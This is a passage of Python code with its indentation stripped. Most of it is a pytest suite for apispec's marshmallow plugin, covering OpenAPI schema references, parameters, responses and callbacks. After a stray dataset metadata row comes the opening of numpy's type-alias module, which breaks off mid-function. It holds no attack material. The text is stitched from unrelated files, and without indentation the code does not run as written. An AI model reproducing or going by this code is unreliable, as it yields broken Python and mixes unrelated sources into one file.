def resolver(schema):
return None
class PetFamilySchema(Schema):
pets_1 = Nested(PetSchema, many=True)
pets_2 = List(Nested(PetSchema))
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.components.schema("PetFamily", schema=PetFamilySchema)
props = get_schemas(spec)["PetFamily"]["properties"]
pets_1 = props["pets_1"]
pets_2 = props["pets_2"]
assert pets_1["type"] == pets_2["type"] == "array"
class TestComponentParameterHelper:
@pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
def test_can_use_schema_in_parameter(self, spec, schema):
if spec.openapi_version.major < 3:
param = {"schema": schema}
else:
param = {"content": {"application/json": {"schema": schema}}}
spec.components.parameter("Pet", "body", param)
parameter = get_parameters(spec)["Pet"]
assert parameter["in"] == "body"
if spec.openapi_version.major < 3:
reference = parameter["schema"]
else:
reference = parameter["content"]["application/json"]["schema"]
assert reference == build_ref(spec, "schema", "Pet")
resolved_schema = spec.components.schemas["Pet"]
assert resolved_schema["properties"]["name"]["type"] == "string"
assert resolved_schema["properties"]["password"]["type"] == "string"
assert resolved_schema["properties"]["id"]["type"] == "integer"
class TestComponentResponseHelper:
@pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
def test_can_use_schema_in_response(self, spec, schema):
if spec.openapi_version.major < 3:
resp = {"schema": schema}
else:
resp = {"content": {"application/json": {"schema": schema}}}
spec.components.response("GetPetOk", resp)
response = get_responses(spec)["GetPetOk"]
if spec.openapi_version.major < 3:
reference = response["schema"]
else:
reference = response["content"]["application/json"]["schema"]
assert reference == build_ref(spec, "schema", "Pet")
resolved_schema = spec.components.schemas["Pet"]
assert resolved_schema["properties"]["id"]["type"] == "integer"
assert resolved_schema["properties"]["name"]["type"] == "string"
assert resolved_schema["properties"]["password"]["type"] == "string"
@pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
def test_can_use_schema_in_response_header(self, spec, schema):
resp = {"headers": {"PetHeader": {"schema": schema}}}
spec.components.response("GetPetOk", resp)
response = get_responses(spec)["GetPetOk"]
reference = response["headers"]["PetHeader"]["schema"]
assert reference == build_ref(spec, "schema", "Pet")
resolved_schema = spec.components.schemas["Pet"]
assert resolved_schema["properties"]["id"]["type"] == "integer"
assert resolved_schema["properties"]["name"]["type"] == "string"
assert resolved_schema["properties"]["password"]["type"] == "string"
@pytest.mark.parametrize("spec", ("3.0.0",), indirect=True)
def test_content_without_schema(self, spec):
resp = {"content": {"application/json": {"example": {"name": "Example"}}}}
spec.components.response("GetPetOk", resp)
response = get_responses(spec)["GetPetOk"]
assert response == resp
class TestCustomField:
def test_can_use_custom_field_decorator(self, spec_fixture):
@spec_fixture.marshmallow_plugin.map_to_openapi_type(DateTime)
class CustomNameA(Field):
pass
@spec_fixture.marshmallow_plugin.map_to_openapi_type("integer", "int32")
class CustomNameB(Field):
pass
with pytest.raises(TypeError):
@spec_fixture.marshmallow_plugin.map_to_openapi_type("integer")
class BadCustomField(Field):
pass
class CustomPetASchema(PetSchema):
name = CustomNameA()
class CustomPetBSchema(PetSchema):
name = CustomNameB()
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.components.schema("CustomPetA", schema=CustomPetASchema)
spec_fixture.spec.components.schema("CustomPetB", schema=CustomPetBSchema)
props_0 = get_schemas(spec_fixture.spec)["Pet"]["properties"]
props_a = get_schemas(spec_fixture.spec)["CustomPetA"]["properties"]
props_b = get_schemas(spec_fixture.spec)["CustomPetB"]["properties"]
assert props_0["name"]["type"] == "string"
assert "format" not in props_0["name"]
assert props_a["name"]["type"] == "string"
assert props_a["name"]["format"] == "date-time"
assert props_b["name"]["type"] == "integer"
assert props_b["name"]["format"] == "int32"
def get_nested_schema(schema, field_name):
try:
return schema._declared_fields[field_name]._schema
except AttributeError:
return schema._declared_fields[field_name]._Nested__schema
class TestOperationHelper:
@pytest.fixture
def make_pet_callback_spec(self, spec_fixture):
def _make_pet_spec(operations):
spec_fixture.spec.path(
path="/pet",
operations={
"post": {"callbacks": {"petEvent": {"petCallbackUrl": operations}}}
},
)
return spec_fixture
return _make_pet_spec
@pytest.mark.parametrize(
"pet_schema",
(PetSchema, PetSchema(), PetSchema(many=True), "tests.schemas.PetSchema"),
)
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_v2(self, spec_fixture, pet_schema):
spec_fixture.spec.path(
path="/pet",
operations={
"get": {
"responses": {
200: {
"schema": pet_schema,
"description": "successful operation",
"headers": {"PetHeader": {"schema": pet_schema}},
}
}
}
},
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
if isinstance(pet_schema, Schema) and pet_schema.many is True:
assert get["responses"]["200"]["schema"]["type"] == "array"
schema_reference = get["responses"]["200"]["schema"]["items"]
assert (
get["responses"]["200"]["headers"]["PetHeader"]["schema"]["type"]
== "array"
)
header_reference = get["responses"]["200"]["headers"]["PetHeader"][
"schema"
]["items"]
else:
schema_reference = get["responses"]["200"]["schema"]
header_reference = get["responses"]["200"]["headers"]["PetHeader"]["schema"]
assert schema_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert header_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert len(spec_fixture.spec.components.schemas) == 1
resolved_schema = spec_fixture.spec.components.schemas["Pet"]
assert resolved_schema == spec_fixture.openapi.schema2jsonschema(PetSchema)
assert get["responses"]["200"]["description"] == "successful operation"
@pytest.mark.parametrize(
"pet_schema",
(PetSchema, PetSchema(), PetSchema(many=True), "tests.schemas.PetSchema"),
)
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_v3(self, spec_fixture, pet_schema):
spec_fixture.spec.path(
path="/pet",
operations={
"get": {
"responses": {
200: {
"content": {"application/json": {"schema": pet_schema}},
"description": "successful operation",
"headers": {"PetHeader": {"schema": pet_schema}},
}
}
}
},
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
if isinstance(pet_schema, Schema) and pet_schema.many is True:
assert (
get["responses"]["200"]["content"]["application/json"]["schema"]["type"]
== "array"
)
schema_reference = get["responses"]["200"]["content"]["application/json"][
"schema"
]["items"]
assert (
get["responses"]["200"]["headers"]["PetHeader"]["schema"]["type"]
== "array"
)
header_reference = get["responses"]["200"]["headers"]["PetHeader"][
"schema"
]["items"]
else:
schema_reference = get["responses"]["200"]["content"]["application/json"][
"schema"
]
header_reference = get["responses"]["200"]["headers"]["PetHeader"]["schema"]
assert schema_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert header_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert len(spec_fixture.spec.components.schemas) == 1
resolved_schema = spec_fixture.spec.components.schemas["Pet"]
assert resolved_schema == spec_fixture.openapi.schema2jsonschema(PetSchema)
assert get["responses"]["200"]["description"] == "successful operation"
@pytest.mark.parametrize(
"pet_schema",
(PetSchema, PetSchema(), PetSchema(many=True), "tests.schemas.PetSchema"),
)
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_v3(self, make_pet_callback_spec, pet_schema):
spec_fixture = make_pet_callback_spec(
{
"get": {
"responses": {
"200": {
"content": {"application/json": {"schema": pet_schema}},
"description": "successful operation",
"headers": {"PetHeader": {"schema": pet_schema}},
}
}
}
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
if isinstance(pet_schema, Schema) and pet_schema.many is True:
assert (
get["responses"]["200"]["content"]["application/json"]["schema"]["type"]
== "array"
)
schema_reference = get["responses"]["200"]["content"]["application/json"][
"schema"
]["items"]
assert (
get["responses"]["200"]["headers"]["PetHeader"]["schema"]["type"]
== "array"
)
header_reference = get["responses"]["200"]["headers"]["PetHeader"][
"schema"
]["items"]
else:
schema_reference = get["responses"]["200"]["content"]["application/json"][
"schema"
]
header_reference = get["responses"]["200"]["headers"]["PetHeader"]["schema"]
assert schema_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert header_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert len(spec_fixture.spec.components.schemas) == 1
resolved_schema = spec_fixture.spec.components.schemas["Pet"]
assert resolved_schema == spec_fixture.openapi.schema2jsonschema(PetSchema)
assert get["responses"]["200"]["description"] == "successful operation"
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_expand_parameters_v2(self, spec_fixture):
spec_fixture.spec.path(
path="/pet",
operations={
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {
"parameters": [
{
"in": "body",
"description": "a pet schema",
"required": True,
"name": "pet",
"schema": PetSchema,
}
]
},
},
)
p = get_paths(spec_fixture.spec)["/pet"]
get = p["get"]
assert get["parameters"] == spec_fixture.openapi.schema2parameters(
PetSchema(), location="query"
)
post = p["post"]
assert post["parameters"] == spec_fixture.openapi.schema2parameters(
PetSchema,
location="body",
required=True,
name="pet",
description="a pet schema",
)
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_expand_parameters_v3(self, spec_fixture):
spec_fixture.spec.path(
path="/pet",
operations={
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {
"requestBody": {
"description": "a pet schema",
"required": True,
"content": {"application/json": {"schema": PetSchema}},
}
},
},
)
p = get_paths(spec_fixture.spec)["/pet"]
get = p["get"]
assert get["parameters"] == spec_fixture.openapi.schema2parameters(
PetSchema(), location="query"
)
for parameter in get["parameters"]:
description = parameter.get("description", False)
assert description
name = parameter["name"]
assert description == PetSchema.description[name]
post = p["post"]
post_schema = spec_fixture.marshmallow_plugin.resolver.resolve_schema_dict(
PetSchema
)
assert (
post["requestBody"]["content"]["application/json"]["schema"] == post_schema
)
assert post["requestBody"]["description"] == "a pet schema"
assert post["requestBody"]["required"]
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_expand_parameters_v3(self, make_pet_callback_spec):
spec_fixture = make_pet_callback_spec(
{
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {
"requestBody": {
"description": "a pet schema",
"required": True,
"content": {"application/json": {"schema": PetSchema}},
}
},
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
assert get["parameters"] == spec_fixture.openapi.schema2parameters(
PetSchema(), location="query"
)
for parameter in get["parameters"]:
description = parameter.get("description", False)
assert description
name = parameter["name"]
assert description == PetSchema.description[name]
post = c["post"]
post_schema = spec_fixture.marshmallow_plugin.resolver.resolve_schema_dict(
PetSchema
)
assert (
post["requestBody"]["content"]["application/json"]["schema"] == post_schema
)
assert post["requestBody"]["description"] == "a pet schema"
assert post["requestBody"]["required"]
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_uses_ref_if_available_v2(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet", operations={"get": {"responses": {200: {"schema": PetSchema}}}}
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
assert get["responses"]["200"]["schema"] == build_ref(
spec_fixture.spec, "schema", "Pet"
)
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_uses_ref_if_available_v3(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet",
operations={
"get": {
"responses": {
200: {"content": {"application/json": {"schema": PetSchema}}}
}
}
},
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
assert get["responses"]["200"]["content"]["application/json"][
"schema"
] == build_ref(spec_fixture.spec, "schema", "Pet")
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_uses_ref_if_available_v3(self, make_pet_callback_spec):
spec_fixture = make_pet_callback_spec(
{
"get": {
"responses": {
"200": {"content": {"application/json": {"schema": PetSchema}}}
}
}
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
assert get["responses"]["200"]["content"]["application/json"][
"schema"
] == build_ref(spec_fixture.spec, "schema", "Pet")
def test_schema_uses_ref_if_available_name_resolver_returns_none_v2(self):
def resolver(schema):
return None
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.components.schema("Pet", schema=PetSchema)
spec.path(
path="/pet", operations={"get": {"responses": {200: {"schema": PetSchema}}}}
)
get = get_paths(spec)["/pet"]["get"]
assert get["responses"]["200"]["schema"] == build_ref(spec, "schema", "Pet")
def test_schema_uses_ref_if_available_name_resolver_returns_none_v3(self):
def resolver(schema):
return None
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="3.0.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.components.schema("Pet", schema=PetSchema)
spec.path(
path="/pet",
operations={
"get": {
"responses": {
200: {"content": {"application/json": {"schema": PetSchema}}}
}
}
},
)
get = get_paths(spec)["/pet"]["get"]
assert get["responses"]["200"]["content"]["application/json"][
"schema"
] == build_ref(spec, "schema", "Pet")
@pytest.mark.parametrize(
"pet_schema",
(PetSchema, PetSchema(), "tests.schemas.PetSchema"),
)
def test_schema_name_resolver_returns_none_v2(self, pet_schema):
def resolver(schema):
return None
spec = APISpec(
title="Test resolver returns None",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.path(
path="/pet",
operations={"get": {"responses": {200: {"schema": pet_schema}}}},
)
get = get_paths(spec)["/pet"]["get"]
assert "properties" in get["responses"]["200"]["schema"]
@pytest.mark.parametrize(
"pet_schema",
(PetSchema, PetSchema(), "tests.schemas.PetSchema"),
)
def test_schema_name_resolver_returns_none_v3(self, pet_schema):
def resolver(schema):
return None
spec = APISpec(
title="Test resolver returns None",
version="0.1",
openapi_version="3.0.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.path(
path="/pet",
operations={
"get": {
"responses": {
200: {"content": {"application/json": {"schema": pet_schema}}}
}
}
},
)
get = get_paths(spec)["/pet"]["get"]
assert (
"properties"
in get["responses"]["200"]["content"]["application/json"]["schema"]
)
def test_callback_schema_uses_ref_if_available_name_resolver_returns_none_v3(self):
def resolver(schema):
return None
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="3.0.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.components.schema("Pet", schema=PetSchema)
spec.path(
path="/pet",
operations={
"post": {
"callbacks": {
"petEvent": {
"petCallbackUrl": {
"get": {
"responses": {
"200": {
"content": {
"application/json": {
"schema": PetSchema
}
}
}
}
}
}
}
}
}
},
)
p = get_paths(spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
assert get["responses"]["200"]["content"]["application/json"][
"schema"
] == build_ref(spec, "schema", "Pet")
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_uses_ref_in_parameters_and_request_body_if_available_v2(
self, spec_fixture
):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet",
operations={
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {"parameters": [{"in": "body", "schema": PetSchema}]},
},
)
p = get_paths(spec_fixture.spec)["/pet"]
assert "schema" not in p["get"]["parameters"][0]
post = p["post"]
assert len(post["parameters"]) == 1
assert post["parameters"][0]["schema"] == build_ref(
spec_fixture.spec, "schema", "Pet"
)
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_uses_ref_in_parameters_and_request_body_if_available_v3(
self, spec_fixture
):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet",
operations={
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {
"requestBody": {
"content": {"application/json": {"schema": PetSchema}}
}
},
},
)
p = get_paths(spec_fixture.spec)["/pet"]
assert "schema" in p["get"]["parameters"][0]
post = p["post"]
schema_ref = post["requestBody"]["content"]["application/json"]["schema"]
assert schema_ref == build_ref(spec_fixture.spec, "schema", "Pet")
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_uses_ref_in_parameters_and_request_body_if_available_v3(
self, make_pet_callback_spec
):
spec_fixture = make_pet_callback_spec(
{
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {
"requestBody": {
"content": {"application/json": {"schema": PetSchema}}
}
},
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
assert "schema" in c["get"]["parameters"][0]
post = c["post"]
schema_ref = post["requestBody"]["content"]["application/json"]["schema"]
assert schema_ref == build_ref(spec_fixture.spec, "schema", "Pet")
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_array_uses_ref_if_available_v2(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet",
operations={
"get": {
"parameters": [
{
"name": "petSchema",
"in": "body",
"schema": {"type": "array", "items": PetSchema},
}
],
"responses": {
200: {"schema": {"type": "array", "items": PetSchema}}
},
}
},
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
assert len(get["parameters"]) == 1
resolved_schema = {
"type": "array",
"items": build_ref(spec_fixture.spec, "schema", "Pet"),
}
assert get["parameters"][0]["schema"] == resolved_schema
assert get["responses"]["200"]["schema"] == resolved_schema
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_array_uses_ref_if_available_v3(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet",
operations={
"get": {
"parameters": [
{
"name": "Pet",
"in": "query",
"content": {
"application/json": {
"schema": {"type": "array", "items": PetSchema}
}
},
}
],
"responses": {
200: {
"content": {
"application/json": {
"schema": {"type": "array", "items": PetSchema}
}
}
}
},
}
},
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
assert len(get["parameters"]) == 1
resolved_schema = {
"type": "array",
"items": build_ref(spec_fixture.spec, "schema", "Pet"),
}
request_schema = get["parameters"][0]["content"]["application/json"]["schema"]
assert request_schema == resolved_schema
response_schema = get["responses"]["200"]["content"]["application/json"][
"schema"
]
assert response_schema == resolved_schema
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_array_uses_ref_if_available_v3(
self, make_pet_callback_spec
):
spec_fixture = make_pet_callback_spec(
{
"get": {
"parameters": [
{
"name": "Pet",
"in": "query",
"content": {
"application/json": {
"schema": {"type": "array", "items": PetSchema}
}
},
}
],
"responses": {
"200": {
"content": {
"application/json": {
"schema": {"type": "array", "items": PetSchema}
}
}
}
},
}
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
assert len(get["parameters"]) == 1
resolved_schema = {
"type": "array",
"items": build_ref(spec_fixture.spec, "schema", "Pet"),
}
request_schema = get["parameters"][0]["content"]["application/json"]["schema"]
assert request_schema == resolved_schema
response_schema = get["responses"]["200"]["content"]["application/json"][
"schema"
]
assert response_schema == resolved_schema
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_partially_v2(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/parents",
operations={
"get": {
"responses": {
200: {
"schema": {
"type": "object",
"properties": {
"mother": PetSchema,
"father": PetSchema,
},
}
}
}
}
},
)
get = get_paths(spec_fixture.spec)["/parents"]["get"]
assert get["responses"]["200"]["schema"] == {
"type": "object",
"properties": {
"mother": build_ref(spec_fixture.spec, "schema", "Pet"),
"father": build_ref(spec_fixture.spec, "schema", "Pet"),
},
}
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_partially_v3(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/parents",
operations={
"get": {
"responses": {
200: {
"content": {
"application/json": {
"schema": {
"type": "object",
"properties": {
"mother": PetSchema,
"father": PetSchema,
},
}
}
}
}
}
}
},
)
get = get_paths(spec_fixture.spec)["/parents"]["get"]
assert get["responses"]["200"]["content"]["application/json"]["schema"] == {
"type": "object",
"properties": {
"mother": build_ref(spec_fixture.spec, "schema", "Pet"),
"father": build_ref(spec_fixture.spec, "schema", "Pet"),
},
}
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_partially_v3(self, make_pet_callback_spec):
spec_fixture = make_pet_callback_spec(
{
"get": {
"responses": {
"200": {
"content": {
"application/json": {
"schema": {
"type": "object",
"properties": {
"mother": PetSchema,
"father": PetSchema,
},
}
}
}
}
}
}
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
assert get["responses"]["200"]["content"]["application/json"]["schema"] == {
"type": "object",
"properties": {
"mother": build_ref(spec_fixture.spec, "schema", "Pet"),
"father": build_ref(spec_fixture.spec, "schema", "Pet"),
},
}
def test_parameter_reference(self, spec_fixture):
if spec_fixture.spec.openapi_version.major < 3:
param = {"schema": PetSchema}
else:
param = {"content": {"application/json": {"schema": PetSchema}}}
spec_fixture.spec.components.parameter("Pet", "body", param)
spec_fixture.spec.path(
path="/parents", operations={"get": {"parameters": ["Pet"]}}
)
get = get_paths(spec_fixture.spec)["/parents"]["get"]
assert get["parameters"] == [build_ref(spec_fixture.spec, "parameter", "Pet")]
def test_response_reference(self, spec_fixture):
if spec_fixture.spec.openapi_version.major < 3:
resp = {"schema": PetSchema}
else:
resp = {"content": {"application/json": {"schema": PetSchema}}}
spec_fixture.spec.components.response("Pet", resp)
spec_fixture.spec.path(
path="/parents", operations={"get": {"responses": {"200": "Pet"}}}
)
get = get_paths(spec_fixture.spec)["/parents"]["get"]
assert get["responses"] == {
"200": build_ref(spec_fixture.spec, "response", "Pet")
}
def test_schema_global_state_untouched_2json(self, spec_fixture):
assert get_nested_schema(RunSchema, "sample") is None
data = spec_fixture.openapi.schema2jsonschema(RunSchema)
json.dumps(data)
assert get_nested_schema(RunSchema, "sample") is None
def test_schema_global_state_untouched_2parameters(self, spec_fixture):
assert get_nested_schema(RunSchema, "sample") is None
data = spec_fixture.openapi.schema2parameters(RunSchema, location="json")
json.dumps(data)
assert get_nested_schema(RunSchema, "sample") is None
def test_resolve_schema_dict_ref_as_string(self, spec):
schema = {"schema": "PetSchema"}
if spec.openapi_version.major >= 3:
schema = {"content": {"application/json": schema}}
spec.path("/pet/{petId}", operations={"get": {"responses": {"200": schema}}})
resp = get_paths(spec)["/pet/{petId}"]["get"]["responses"]["200"]
if spec.openapi_version.major < 3:
schema = resp["schema"]
else:
schema = resp["content"]["application/json"]["schema"]
assert schema == build_ref(spec, "schema", "PetSchema")
class TestCircularReference:
def test_circular_referencing_schemas(self, spec):
spec.components.schema("Analysis", schema=AnalysisSchema)
definitions = get_schemas(spec)
ref = definitions["Analysis"]["properties"]["sample"]
assert ref == build_ref(spec, "schema", "Sample")
# Regression tests for issue #55
class TestSelfReference:
def test_self_referencing_field_single(self, spec):
spec.components.schema("SelfReference", schema=SelfReferencingSchema)
definitions = get_schemas(spec)
ref = definitions["SelfReference"]["properties"]["single"]
assert ref == build_ref(spec, "schema", "SelfReference")
def test_self_referencing_field_many(self, spec):
spec.components.schema("SelfReference", schema=SelfReferencingSchema)
definitions = get_schemas(spec)
result = definitions["SelfReference"]["properties"]["many"]
assert result == {
"type": "array",
"items": build_ref(spec, "schema", "SelfReference"),
}
class TestOrderedSchema:
def test_ordered_schema(self, spec):
spec.components.schema("Ordered", schema=OrderedSchema)
result = get_schemas(spec)["Ordered"]["properties"]
assert list(result.keys()) == ["field1", "field2", "field3", "field4", "field5"]
class TestFieldWithCustomProps:
def test_field_with_custom_props(self, spec):
spec.components.schema("PatternedObject", schema=PatternedObjectSchema)
result = get_schemas(spec)["PatternedObject"]["properties"]["count"]
assert "x-count" in result
assert result["x-count"] == 1
def test_field_with_custom_props_passed_as_snake_case(self, spec):
spec.components.schema("PatternedObject", schema=PatternedObjectSchema)
result = get_schemas(spec)["PatternedObject"]["properties"]["count2"]
assert "x-count2" in result
assert result["x-count2"] == 2
class TestSchemaWithDefaultValues:
def test_schema_with_default_values(self, spec):
spec.components.schema("DefaultValuesSchema", schema=DefaultValuesSchema)
definitions = get_schemas(spec)
props = definitions["DefaultValuesSchema"]["properties"]
assert props["number_auto_default"]["default"] == 12
assert props["number_manual_default"]["default"] == 42
assert "default" not in props["string_callable_default"]
assert props["string_manual_default"]["default"] == "Manual"
assert "default" not in props["numbers"]
class TestDictValues:
def test_dict_values_resolve_to_additional_properties(self, spec):
class SchemaWithDict(Schema):
dict_field = Dict(values=String())
spec.components.schema("SchemaWithDict", schema=SchemaWithDict)
result = get_schemas(spec)["SchemaWithDict"]["properties"]["dict_field"]
assert result == {"type": "object", "additionalProperties": {"type": "string"}}
def test_dict_with_empty_values_field(self, spec):
class SchemaWithDict(Schema):
dict_field = Dict()
spec.components.schema("SchemaWithDict", schema=SchemaWithDict)
result = get_schemas(spec)["SchemaWithDict"]["properties"]["dict_field"]
assert result == {"type": "object"}
def test_dict_with_nested(self, spec):
class SchemaWithDict(Schema):
dict_field = Dict(values=Nested(PetSchema))
spec.components.schema("SchemaWithDict", schema=SchemaWithDict)
assert len(get_schemas(spec)) == 2
result = get_schemas(spec)["SchemaWithDict"]["properties"]["dict_field"]
assert result == {
"additionalProperties": build_ref(spec, "schema", "Pet"),
"type": "object",
}
class TestList:
def test_list_with_nested(self, spec):
class SchemaWithList(Schema):
list_field = List(Nested(PetSchema))
spec.components.schema("SchemaWithList", schema=SchemaWithList)
assert len(get_schemas(spec)) == 2
result = get_schemas(spec)["SchemaWithList"]["properties"]["list_field"]
assert result == {"items": build_ref(spec, "schema", "Pet"), "type": "array"}
class TestTimeDelta:
def test_timedelta_x_unit(self, spec):
class SchemaWithTimeDelta(Schema):
sec = TimeDelta("seconds")
day = TimeDelta("days")
spec.components.schema("SchemaWithTimeDelta", schema=SchemaWithTimeDelta)
assert (
get_schemas(spec)["SchemaWithTimeDelta"]["properties"]["sec"]["x-unit"]
== "seconds"
)
assert (
get_schemas(spec)["SchemaWithTimeDelta"]["properties"]["day"]["x-unit"]
== "days"
)
| mit | -1,058,647,629,776,743,300 | 38.19885 | 88 | 0.514432 | false | 4.347886 | true | false | false |
anntzer/numpy | numpy/core/_type_aliases.py | 4 | 7807 | """
Due to compatibility, numpy has a very large number of different naming
conventions for the scalar types (those subclassing from `numpy.generic`).
This file produces a convoluted set of dictionaries mapping names to types,
and sometimes other mappings too.
.. data:: allTypes
A dictionary of names to types that will be exposed as attributes through
``np.core.numerictypes.*``
.. data:: sctypeDict
Similar to `allTypes`, but maps a broader set of aliases to their types.
.. data:: sctypes
A dictionary keyed by a "type group" string, providing a list of types
under that group.
"""
from numpy.compat import unicode
from numpy.core._string_helpers import english_lower
from numpy.core.multiarray import typeinfo, dtype
from numpy.core._dtype import _kind_name
sctypeDict = {} # Contains all leaf-node scalar types with aliases
allTypes = {} # Collect the types we will add to the module
# separate the actual type info from the abstract base classes
_abstract_types = {}
_concrete_typeinfo = {}
for k, v in typeinfo.items():
# make all the keys lowercase too
k = english_lower(k)
if isinstance(v, type):
_abstract_types[k] = v
else:
_concrete_typeinfo[k] = v
_concrete_types = {v.type for k, v in _concrete_typeinfo.items()}
def _bits_of(obj):
try:
info = next(v for v in _concrete_typeinfo.values() if v.type is obj)
except StopIteration:
if obj in _abstract_types.values():
raise ValueError("Cannot count the bits of an abstract type")
# some third-party type - make a best-guess
return dtype(obj).itemsize * 8
else:
return info.bits
def bitname(obj):
"""Return a bit-width name for a given type object"""
bits = _bits_of(obj)
dt = dtype(obj)
char = dt.kind
base = _kind_name(dt)
if base == 'object':
bits = 0
if bits != 0:
char = "%s%d" % (char, bits // 8)
return base, bits, char
def _add_types():
for name, info in _concrete_typeinfo.items():
# define C-name and insert typenum and typechar references also
allTypes[name] = info.type
sctypeDict[name] = info.type
sctypeDict[info.char] = info.type
sctypeDict[info.num] = info.type
for name, cls in _abstract_types.items():
allTypes[name] = cls
_add_types()
# This is the priority order used to assign the bit-sized NPY_INTxx names, which
# must match the order in npy_common.h in order for NPY_INTxx and np.intxx to be
# consistent.
# If two C types have the same size, then the earliest one in this list is used
# as the sized name.
_int_ctypes = ['long', 'longlong', 'int', 'short', 'byte']
_uint_ctypes = list('u' + t for t in _int_ctypes)
def _add_aliases():
for name, info in _concrete_typeinfo.items():
# these are handled by _add_integer_aliases
if name in _int_ctypes or name in _uint_ctypes:
continue
# insert bit-width version for this class (if relevant)
base, bit, char = bitname(info.type)
myname = "%s%d" % (base, bit)
# ensure that (c)longdouble does not overwrite the aliases assigned to
# (c)double
if name in ('longdouble', 'clongdouble') and myname in allTypes:
continue
allTypes[myname] = info.type
# add mapping for both the bit name and the numarray name
sctypeDict[myname] = info.type
# add forward, reverse, and string mapping to numarray
sctypeDict[char] = info.type
# Add deprecated numeric-style type aliases manually, at some point
# we may want to deprecate the lower case "bytes0" version as well.
for name in ["Bytes0", "Datetime64", "Str0", "Uint32", "Uint64"]:
if english_lower(name) not in allTypes:
# Only one of Uint32 or Uint64, aliases of `np.uintp`, was (and is) defined, note that this
# is not UInt32/UInt64 (capital i), which is removed.
continue
allTypes[name] = allTypes[english_lower(name)]
sctypeDict[name] = sctypeDict[english_lower(name)]
_add_aliases()
def _add_integer_aliases():
seen_bits = set()
